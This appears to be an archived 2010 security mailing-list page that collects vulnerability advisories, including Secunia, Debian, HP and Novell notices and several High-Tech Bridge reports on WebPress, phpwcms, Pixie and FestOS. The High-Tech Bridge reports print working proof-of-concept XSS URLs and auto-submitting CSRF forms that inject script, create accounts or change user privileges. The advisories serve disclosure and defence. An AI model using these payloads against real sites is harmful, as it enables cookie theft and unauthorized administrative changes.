== Secunia Research 15/07/2010 - GIGABYTE Dldrv2 ActiveX Control Unsafe Methods - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerability.4 Solution.5 Time Table...6 Credits..7 References...8 About Secunia9 Verification10 == 1) Affected Software * GIGABYTE Dldrv2 ActiveX Control 1.4.206.11 NOTE: Other versions may also be affected. == 2) Severity Rating: Highly critical Impact: System compromise Where: Remote == 3) Vendor's Description of Software GIGABYTE's Download Center allows you to quickly download and update your BIOS as well as the latest system drivers.. Product Link: http://download.gigabyte.com.tw/ == 4) Description of Vulnerability Secunia Research has discovered some vulnerabilities in GIGABYTE Dldrv2 ActiveX Control, which can be exploited by malicious people to compromise a user's system. 1) The unsafe method dl() allows automatically downloading and executing an arbitrary file. 2) Combined usage of the unsafe methods SetDLInfo() and Bdl() allows automatically downloading an arbitrary file to an arbitrary location on the user's system. == 5) Solution Set the kill-bit for the ActiveX control. == 6) Time Table 18/06/2010 - Vendor notified. 29/06/2010 - Vendor response. 15/07/2010 - Public disclosure. == 7) Credits Discovered by Carsten Eiram, Secunia Research. == 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2010-1517 for the vulnerabilities. == 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/ == 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2010-85/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ==
XSS vulnerability in WebPress
Vulnerability ID: HTB22480 Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_webpress_2.html Product: WebPress Vendor: YWP ( http://www.goywp.com/ ) Vulnerable Version: Current at 01.07.2010 and Probably Prior Versions Vendor Notification: 01 July 2010 Vulnerability Type: XSS (Cross Site Scripting) Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level: Medium Credit: High-Tech Bridge SA - Ethical Hacking Penetration Testing (http://www.htbridge.ch/) Vulnerability Details: User can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the admin_page_sidemenu_blocks_action.php script to properly sanitize user-supplied input in id_num_mod variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. An attacker can use browser to exploit this vulnerability. The following PoC is available: http://host/path/_system/menus/sidemenu_blocks/_pages/admin_page_sidemenu_blocks_action.php?id_num_mod=1%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Edcfsubmit_action=Edit
Re: pam_captcha username harvest vulnerability
On Tue, Jul 6, 2010 at 11:04 AM, Ian Maguire imagu...@superb.net wrote: pam_captcha is visual text-based CAPTCHA challenge module for PAM that uses figlet to generate the CAPTCHAs. Project site: http://www.semicomplete.com/projects/pam_captcha/ A site with a screen shot: http://www.michaelboman.org/how-to/securing-ssh-access-with-pam-captcha I found a security problem with the pam_captcha. If you enter a username that is not a valid user followed by the correct CAPTCHA, you do not get prompted for a password. You simply get prompted for another CAPTCHA. However, if you enter a username that is a valid user followed by the correct CAPTCHA, you will get prompted for a password. This means an attacker, or a script/bot could easily harvest a list of valid usernames simply by whether or not it prompts for a password after a valid captcha entry. I have duplicated this behavior in FreeBSD 8.0 which uses BSD's OpenPAM. From what I have seen this module is not compatible with Linux-PAM. I don't know enough C Fu to propose a patch. Until it is patched the solution is to disable pam_captcha in your pam config file. The creator of this module seems to think that using this module isn't really even necessary. http://www.semicomplete.com/blog/geekery/pam_captcha_research.html - ian I can't reproduce the behavior you describe on FreeBSD 8.0 nor on Ubuntu 9.10. It seems more likely that what you experience is actually misconfigured sshd/pam. With pam_captcha 1.3 on a fresh FreeBSD 8.0-RELEASE and this /etc/pam.d/sshd config: authsufficient pam_opie.so no_warn no_fake_prompts authrequisite pam_opieaccess.so no_warn allow_local auth requisite pam_captcha.so randomstring #auth sufficient pam_krb5.so no_warn try_first_pass #auth sufficient pam_ssh.sono_warn try_first_pass authrequired pam_unix.so no_warn try_first_pass My sshd_config has this: ChallengeResponseAuthentication yes PasswordAuthentication no UsePAM yes What I see: Successful pass of the captcha with an invalid username results in being given another captcha or an abort (if this is multiple failures) and PAM logs the fact that there was a failure due to invalid user. For example, if you don't disable PasswordAuthentication then pam failures could (captcha or other failures) will give up after a few tries and move on to Password auth (no captcha) auth instead. Are you sure this isn't something misconfigured on your side? Can you publish your sshd_config and pam configs? -Jordan
[SECURITY] [DSA 2071-1] New libmikmod packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-2071-1 secur...@debian.org http://www.debian.org/security/ Moritz Muehlenhoff July 14, 2010 http://www.debian.org/security/faq - Package: libmikmod Vulnerability : buffer overflows Problem type : local(remote) Debian-specific: no CVE Id(s) : CVE-2009-3995 CVE-2009-3996 Dyon Balding discovered buffer overflows in the MikMod sound library, which could lead to the execution of arbitrary code if a user is tricked into opening malformed Impulse Tracker or Ultratracker sound files. For the stable distribution (lenny), these problems have been fixed in version 3.1.11-6+lenny1. For the unstable distribution (sid), these problems have been fixed in version 3.1.11-6.2. We recommend that you upgrade your libmikmod packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 5.0 alias lenny - Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod_3.1.11-6+lenny1.dsc Size/MD5 checksum: 1038 9741350a41a54261dbf242f02aa325fd http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod_3.1.11.orig.tar.gz Size/MD5 checksum: 611590 705106da305e8de191549f1e7393185c http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod_3.1.11-6+lenny1.diff.gz Size/MD5 checksum: 336630 4e4d04d2c9b5bcdd3edb3b04e683ea86 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2_3.1.11-a-6+lenny1_alpha.deb Size/MD5 checksum: 221696 e01fb2f9c7e693ae7b0727a552da31a1 http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6+lenny1_alpha.deb Size/MD5 checksum: 378570 dd8abb7da4195af53aed1e57750d2f1f amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2_3.1.11-a-6+lenny1_amd64.deb Size/MD5 checksum: 157216 b3836423b8875f21d5ae01d5f9b533c5 http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6+lenny1_amd64.deb Size/MD5 checksum: 265776 935b94d522dd814337b06acd07184fb7 arm architecture (ARM) http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2_3.1.11-a-6+lenny1_arm.deb Size/MD5 checksum: 164040 f2fdc8c7f4c7f54ec75ffd179c98ddca http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6+lenny1_arm.deb Size/MD5 checksum: 264064 2eba8b4037ca117fc8920563d2b05ca3 armel architecture (ARM EABI) http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2_3.1.11-a-6+lenny1_armel.deb Size/MD5 checksum: 155766 916c6a467219ed4a5e0da68168c1e591 http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6+lenny1_armel.deb Size/MD5 checksum: 254664 77c56898614f92c30e0ad5ef2de7c0cc hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2_3.1.11-a-6+lenny1_hppa.deb Size/MD5 checksum: 185910 6b044e5ce0fb2de4fc37a8ddbbd037a0 http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6+lenny1_hppa.deb Size/MD5 checksum: 299236 40db7231bf6258319f45412c1d46df50 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6+lenny1_i386.deb Size/MD5 checksum: 244570 c4363c834307008b053bb1899a13013f http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2_3.1.11-a-6+lenny1_i386.deb Size/MD5 checksum: 147266 3d8adb8a243afb7a614052ba7494e01e ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2_3.1.11-a-6+lenny1_ia64.deb Size/MD5 checksum: 264426 c2d6c1a0d1b32ff27030ec2f1cd3ebe4 http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6+lenny1_ia64.deb Size/MD5 checksum: 391590 39c904baed7a4462ccbf10805cae88c0 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2_3.1.11-a-6+lenny1_mips.deb Size/MD5 checksum: 167728 708a04685879d374730d4b94dd87a7d8
XSS vulnerability in phpwcms
Vulnerability ID: HTB22475 Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_phpwcms.html Product: phpwcms Vendor: Oliver Georgi ( http://www.phpwcms.de/ ) Vulnerable Version: 1.4.5 and Probably Prior Versions Vendor Notification: 01 July 2010 Vulnerability Type: Stored XSS (Cross Site Scripting) Status: Fixed by Vendor Risk level: Medium Credit: High-Tech Bridge SA - Ethical Hacking Penetration Testing (http://www.htbridge.ch/) Vulnerability Details: User can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the phpwcms.php script to properly sanitize user-supplied input in calendardate variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. An attacker can use browser to exploit this vulnerability. The following PoC is available: http://host/phpwcms.php?do=modulesmodule=calendarcalendardate=8-2010%22+onmouseover=alert%2834%29+style=position:absolute;width:100%;height:100%;left:0;top:0;+%22 Solution: Upgrade to the most recent version
Stored XSS vulnerability in Pixie
Vulnerability ID: HTB22469
Reference:
http://www.htbridge.ch/advisory/stored_xss_vulnerability_in_pixie.html
Product: Pixie
Vendor: Toggle Labs Ltd ( http://www.getpixie.co.uk/ )
Vulnerable Version: 1.0.4 and Probably Prior Versions
Vendor Notification: 01 July 2010
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking Penetration Testing
(http://www.htbridge.ch/)
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to failure in the Pixie core settings saving
script to properly sanitize user-supplied input in sysmess variable.
Successful exploitation of this vulnerability could result in a compromise of
the application, theft of cookie-based authentication credentials, disclosure
or modification of sensitive data.
An attacker can use browser to exploit this vulnerability. The following PoC is
available:
form accept-charset=UTF-8
action=http://host/admin/index.php?s=settingsx=pixie; method=post
name=main
input type=hidden name=langu value=en-gb /
input type=hidden name=time_zone value=+0 /
input type=hidden name=dstime value=no /
input type=hidden name=dateformat value=%Oe %B %Y, %H:%M /
input type=hidden name=rte value=1 /
input type=hidden name=logs value=5 /
input type=hidden name=sysmess value='hello
messagescriptalert(document.cookie)/script' /
input type=submit name=settings_edit id=form_addedit_submit
value=Update /
/form
script
document.getElementById('form_addedit_submit').click();
/script
[security bulletin] HPSBUX02556 SSRT100014 rev.1 - HP-UX Running rpc.ttdbserver, Remote Execution of Arbitrary Code
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c02288473 Version: 1 HPSBUX02556 SSRT100014 rev.1 - HP-UX Running rpc.ttdbserver, Remote Execution of Arbitrary Code NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2010-07-13 Last Updated: 2010-07-13 Potential Security Impact: Remote execution of arbitrary code Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP-UX running rpc.ttdbserver. The vulnerability could be exploited remotely to execute arbitrary code. References: CVE-2010-0083 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.11, B.11.23, B.11.31 running rpc.ttdbserver BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2010-0083(AV:N/AC:M/Au:S/C:C/I:C/A:C) 8.5 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION The vulnerability can be resolved by disabling rtp.ttdbserver. Note: The rpc.ttdbserver process is not needed for programs provided in the HP CDE product. To Disable rpc.ttdbserver Edit /etc/inetd.conf and comment out the rpc.ttdbserver line as follows: #rpc stream tcp swait root /usr/dt/bin/rpc.ttdbserver ... Restart inetd: /usr/sbin/inetd -c Kill any instances of rpc.ttdbserver that might be running. MANUAL ACTIONS: Yes - NonUpdate Disable rpc.ttdbserver PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa The following text is for use by the HP-UX Software Assistant. AFFECTED VERSIONS HP-UX B.11.11 HP-UX B.11.23 HP-UX B.11.31 == CDE.CDE-TT action: disable rpc.ttdbserver END AFFECTED VERSIONS HISTORY Version:1 (rev.1) 13 July 2010 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: security-al...@hp.com Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NAlangcode=USENGjumpid=in_SC-GEN__driverITRCtopiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches -check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems -verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for
XSS vulnerability in Pixie
Vulnerability ID: HTB22468
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_pixie.html
Product: Pixie
Vendor: Toggle Labs Ltd ( http://www.getpixie.co.uk/ )
Vulnerable Version: 1.0.4 and Probably Prior Versions
Vendor Notification: 01 July 2010
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking Penetration Testing
(http://www.htbridge.ch/)
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to failure in the site settings saving script to
properly sanitize user-supplied input in keywords variable. Successful
exploitation of this vulnerability could result in a compromise of the
application, theft of cookie-based authentication credentials, disclosure or
modification of sensitive data.
An attacker can use browser to exploit this vulnerability. The following PoC is
available:
form accept-charset=UTF-8
action=http://host/admin/index.php?s=settingsx=site; method=post
name=main
input type=hidden name=sitename value=Pixie /
input type=hidden name=url value=http://host/; /
input type=hidden name=default value=blog/ /
input type=hidden name=keywords
value='key1scriptalert(document.cookie)/script' /
input type=hidden name=site_auth value=sute author /
input type=hidden name=site_cright value=copyright /
input type=hidden name=cleanurls value=yes /
input type=submit name=settings_edit id=form_addedit_submit
value=Update /
/form
script
document.getElementById('form_addedit_submit').click();
/script
[security bulletin] HPSBMA02550 SSRT100170 rev.2 - HP Insight Software Installer for Windows, Local Unauthorized Access to Data, Remote Cross Site Request Forgery (CSRF)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c02282377 Version: 2 HPSBMA02550 SSRT100170 rev.2 - HP Insight Software Installer for Windows, Local Unauthorized Access to Data, Remote Cross Site Request Forgery (CSRF) NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2010-07-12 Last Updated: 2010-07-14 Potential Security Impact: Local unauthorized access to data, remote Cross Site Request Forgery (CSRF) Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP Insight Software Installer for Windows . The vulnerabilities could be exploited locally to allow unauthorized access to data and remotely to allow Cross Site Request Forgery (CSRF). References: CVE-2010-1967 (unauthorized access to data), CVE-2010-1968 (CSRF) SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Insight Software Installer for Windows for all versions prior to v6.1 BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2010-1967(AV:L/AC:L/Au:S/C:P/I:P/A:N) 3.2 CVE-2010-1968(AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has made an update available to resolve the vulnerabilities. The update can be downloaded from http://h18000.www1.hp.com/products/servers/management/fpdownload.html HP Insight Software Installer v6.1 or subsequent PRODUCT SPECIFIC INFORMATION None HISTORY Version:1 (rev.1) - 12 July 2010 Initial release Version:2 (rev.2) - 14 July 2010 Corrected CVE number in References section Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: security-al...@hp.com Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NAlangcode=USENGjumpid=in_SC-GEN__driverITRCtopiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches -check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems -verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement. Copyright 2009 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial
XSS vulnerability in FestOS
Vulnerability ID: HTB22473 Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_festos_1.html Product: FestOS Vendor: Skypanther Studios, Inc ( http://festengine.org/ ) Vulnerable Version: 2.3b and Probably Prior Versions Vendor Notification: 01 July 2010 Vulnerability Type: Stored XSS (Cross Site Scripting) Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level: Medium Credit: High-Tech Bridge SA - Ethical Hacking Penetration Testing (http://www.htbridge.ch/) Vulnerability Details: User can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the /admin/do_snippets_edit.php script to properly sanitize user-supplied input in contents variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. An attacker can use browser to exploit this vulnerability. The following PoC is available: form action=http://host/admin/do_snippets_edit.php?tabname=Pages; method=post name=main input type=hidden name=snippetID value=1 / input type=hidden name=title value=Site footer / input type=hidden name=active value=1 / input type=hidden name=contents value='footerscriptalert(document.cookie)/script' / /form script document.main.submit(); /script
XSRF (CSRF) in Pixie
Vulnerability ID: HTB22471
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_pixie_1.html
Product: Pixie
Vendor: Toggle Labs Ltd ( http://www.getpixie.co.uk/ )
Vulnerable Version: 1.0.4 and Probably Prior Versions
Vendor Notification: 01 July 2010
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Low
Credit: High-Tech Bridge SA - Ethical Hacking Penetration Testing
(http://www.htbridge.ch/)
Vulnerability Details:
The vulnerability exists due to failure in the user privilieges script to
properly verify the source of HTTP request.
Successful exploitation of this vulnerability could result in a compromise of
the application, theft of cookie-based authentication credentials, disclosure
or modification of sensitive data.
Attacker can use browser to exploit this vulnerability. The following PoC is
available:
form accept-charset=UTF-8
action=http://host/admin/index.php?s=settingsamp;x=users; method=post
name=main
input type=hidden name=uname value=test /
input type=hidden name=realname value=test name2 /
input type=hidden name=email value=myem...@myemaildomain.com /
input type=submit name=user_edit id=sbmtit value=Update /
input type=hidden name=privilege value=2 /
input type=hidden name=user_id value=2 /
/form
script
document.getElementById('sbmtit').click();
/script
XSS vulnerability in FestOS
Vulnerability ID: HTB22472 Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_festos.html Product: FestOS Vendor: Skypanther Studios, Inc ( http://festengine.org/ ) Vulnerable Version: 2.3b and Probably Prior Versions Vendor Notification: 01 July 2010 Vulnerability Type: XSS (Cross Site Scripting) Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level: Medium Credit: High-Tech Bridge SA - Ethical Hacking Penetration Testing (http://www.htbridge.ch/) Vulnerability Details: User can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the /admin/do_pages_edit.php script to properly sanitize user-supplied input in title variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. An attacker can use browser to exploit this vulnerability. The following PoC is available: form action=http://host/admin/do_pages_edit.php; method=post name=main input type=hidden name=pageID value=2 / input type=hidden name=title value='titlescriptalert(document.cookie)/script' / input type=hidden name=alias value=home / input type=hidden name=active value=1 / input type=hidden name=contents value='page content here...' / /form script document.main.submit(); /script
XSRF (CSRF) in Pixie
Vulnerability ID: HTB22470 Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_pixie.html Product: Pixie Vendor: Toggle Labs Ltd ( http://www.getpixie.co.uk/ ) Vulnerable Version: 1.0.4 and Probably Prior Versions Vendor Notification: 01 July 2010 Vulnerability Type: CSRF (Cross-Site Request Forgery) Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level: Medium Credit: High-Tech Bridge SA - Ethical Hacking Penetration Testing (http://www.htbridge.ch/) Vulnerability Details: The vulnerability exists due to failure in the user creating script to properly verify the source of HTTP request. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. Attacker can use browser to exploit this vulnerability. The following PoC is available: form accept-charset=UTF-8 action=http://host/admin/index.php?s=settingsamp;x=users; method=post name=main input type=hidden name=uname value=myusername / input type=hidden name=realname value=My Real Name / input type=text name=email value=myem...@myemaildomain.com / input type=hidden name=user_new value=Save / input type=hidden name=privilege value=2 / /form script document.main.submit(); /script
XSS vulnerability in WebPress
Vulnerability ID: HTB22479 Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_webpress_1.html Product: WebPress Vendor: YWP ( http://www.goywp.com/ ) Vulnerable Version: Current at 01.07.2010 and Probably Prior Versions Vendor Notification: 01 July 2010 Vulnerability Type: XSS (Cross Site Scripting) Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level: Medium Credit: High-Tech Bridge SA - Ethical Hacking Penetration Testing (http://www.htbridge.ch/) Vulnerability Details: User can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the admin_page_listings_entries_amd_form.php script to properly sanitize user-supplied input in range_listing_id variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. An attacker can use browser to exploit this vulnerability. The following PoC is available: http://host/path/_system/listings/entries/_pages/admin_page_listings_entries_amd_form.php?range_listing_id=1%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Elisting_id=1
{PRL} Novell Groupwise Webaccess Stack Overflow
# Application: Novell Groupwise Webaccess Stack Overflow Platforms: Windows, Linux Netware (GroupWise 7.0, 7.01, 7.02, 7.03x, 7.04, 8.0, 8.01x) Exploitation: Remote code execution CVE Number: Novell TID: 7006380 Author: Francis Provencher (Protek Research Lab's) WebSite: http://www.protekresearchlab.com/ # 1) Introduction 2) Report Timeline 3) Technical details 4) The Code # === 1) Introduction === Novell, Inc. is a global software and services company based in Waltham, Massachusetts. The company specializes in enterprise operating systems, such as SUSE Linux Enterprise and Novell NetWare; identity, security, and systems management solutions; and collaboration solutions, such as Novell Groupwise and Novell Pulse. Novell was instrumental in making the Utah Valley a focus for technology and software development. Novell technology contributed to the emergence of local area networks, which displaced the dominant mainframe computing model and changed computing worldwide. Today, a primary focus of the company is on developing open source software for enterprise clients. (http://en.wikipedia.org/wiki/Novell) # 2) Report Timeline 2010-05-27 Vendor Contact 2010-05-28 Vendor Response 2010-07-15 Patch Release (Groupwise 8.0.2) # 3) Technical details The user Proxy feature of Novell GroupWise WebAccess is vulnerable to a stack overflow exploit. An authenticated user could potentially trigger and execute arbitrary code with Root or SYSTEM rigths on compromise server. To overwrite the stack, 1294 byte have to been sent to the user proxy feature. # === 4) The Code === This issue can be trigger manually; a The stack will be overwrite with 0x62626262 # (PRL-2010-05)
XSRF (CSRF) in phpwcms
Vulnerability ID: HTB22476 Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_phpwcms.html Product: phpwcms Vendor: Oliver Georgi ( http://www.phpwcms.de/ ) Vulnerable Version: 1.4.5 and Probably Prior Versions Vendor Notification: 01 July 2010 Vulnerability Type: CSRF (Cross-Site Request Forgery) Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level: Low Credit: High-Tech Bridge SA - Ethical Hacking Penetration Testing (http://www.htbridge.ch/) Vulnerability Details: The vulnerability exists due to failure in the phpwcms.php script to properly verify the source of HTTP request. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. Attacker can use browser to exploit this vulnerability. The following PoC is available: form action=http://host/phpwcms.php?do=admins=1; name=m method=POST input type=hidden name=form_newloginname value=aaa input type=hidden name=form_newpassword value=aaa input type=hidden name=form_newemail value=a...@example.com input type=hidden name=form_newrealname value= input type=hidden name=form_feuser value=2 input type=hidden name=form_active value=1 input type=hidden name=verification_email value=1 input type=hidden name=form_aktion value=create_account input type=hidden name=Submit value=send+user+data /form script document.m.submit(); /script
XSS vulnerability in WebPress
Vulnerability ID: HTB22478 Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_webpress.html Product: WebPress Vendor: YWP ( http://www.goywp.com/ ) Vulnerable Version: Current at 01.07.2010 and Probably Prior Versions Vendor Notification: 01 July 2010 Vulnerability Type: XSS (Cross Site Scripting) Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level: Medium Credit: High-Tech Bridge SA - Ethical Hacking Penetration Testing (http://www.htbridge.ch/) Vulnerability Details: User can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the admin_page_listings_lists_action.php script to properly sanitize user-supplied input in id_num_mod variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. An attacker can use browser to exploit this vulnerability. The following PoC is available: http://host/path/_system/listings/lists/_pages/admin_page_listings_lists_action.php?id_num_mod=1%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Esubmit_action=Edit
ClubHack2010 CFP
